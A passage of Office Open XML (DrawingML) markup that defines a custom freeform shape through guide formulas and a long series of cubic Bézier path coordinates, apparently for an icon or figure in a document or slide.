                  <a:gd name="T24" fmla="*/ 59 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 118 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 160 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 153 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 150 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 166 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 74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2 h 209"/>
                  <a:gd name="T58" fmla="*/ 65 w 179"/>
                  <a:gd name="T59" fmla="*/ 177 h 209"/>
                  <a:gd name="T60" fmla="*/ 70 w 179"/>
                  <a:gd name="T61" fmla="*/ 197 h 209"/>
                  <a:gd name="T62" fmla="*/ 69 w 179"/>
                  <a:gd name="T63" fmla="*/ 182 h 209"/>
                  <a:gd name="T64" fmla="*/ 109 w 179"/>
                  <a:gd name="T65" fmla="*/ 179 h 209"/>
                  <a:gd name="T66" fmla="*/ 116 w 179"/>
                  <a:gd name="T67" fmla="*/ 186 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 127 w 179"/>
                  <a:gd name="T73" fmla="*/ 92 h 209"/>
                  <a:gd name="T74" fmla="*/ 128 w 179"/>
                  <a:gd name="T75" fmla="*/ 134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60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 58 h 209"/>
                  <a:gd name="T98" fmla="*/ 87 w 179"/>
                  <a:gd name="T99" fmla="*/ 67 h 209"/>
                  <a:gd name="T100" fmla="*/ 72 w 179"/>
                  <a:gd name="T101" fmla="*/ 40 h 209"/>
                  <a:gd name="T102" fmla="*/ 73 w 179"/>
                  <a:gd name="T103" fmla="*/ 45 h 209"/>
                  <a:gd name="T104" fmla="*/ 100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2" y="155"/>
                      <a:pt x="162" y="158"/>
                      <a:pt x="163" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="165"/>
                      <a:pt x="167" y="168"/>
                      <a:pt x="171" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="171"/>
                      <a:pt x="174" y="172"/>
                      <a:pt x="176" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="207"/>
                      <a:pt x="120" y="205"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="199"/>
                      <a:pt x="114" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="91" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="202"/>
                      <a:pt x="65" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="149"/>
                      <a:pt x="24" y="149"/>
                      <a:pt x="24" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="24" y="159"/>
                      <a:pt x="18" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="162"/>
                      <a:pt x="10" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="4" y="164"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="137"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="33"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="158" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="67"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="73"/>
                      <a:pt x="65" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="89"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59"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6" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="141"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="129"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="138"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="73" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="71" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="183"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="69" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="77" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="186"/>
                      <a:pt x="97" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="184"/>
                      <a:pt x="106" y="182"/>
                      <a:pt x="109" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="177"/>
                      <a:pt x="112" y="175"/>
                      <a:pt x="114" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="116" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="116" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="117" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="120" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="119" y="163"/>
                      <a:pt x="118" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="120" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="147"/>
                      <a:pt x="123" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="133" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="127" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="137" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="129" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="133"/>
                      <a:pt x="128" y="131"/>
                      <a:pt x="128" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="121"/>
                      <a:pt x="127" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="118" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="113" y="79"/>
                      <a:pt x="108" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="107" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="56"/>
                      <a:pt x="107" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="52"/>
                      <a:pt x="98" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="92" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="104" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="102" y="49"/>
                      <a:pt x="103" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="108" y="39"/>
                      <a:pt x="106" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
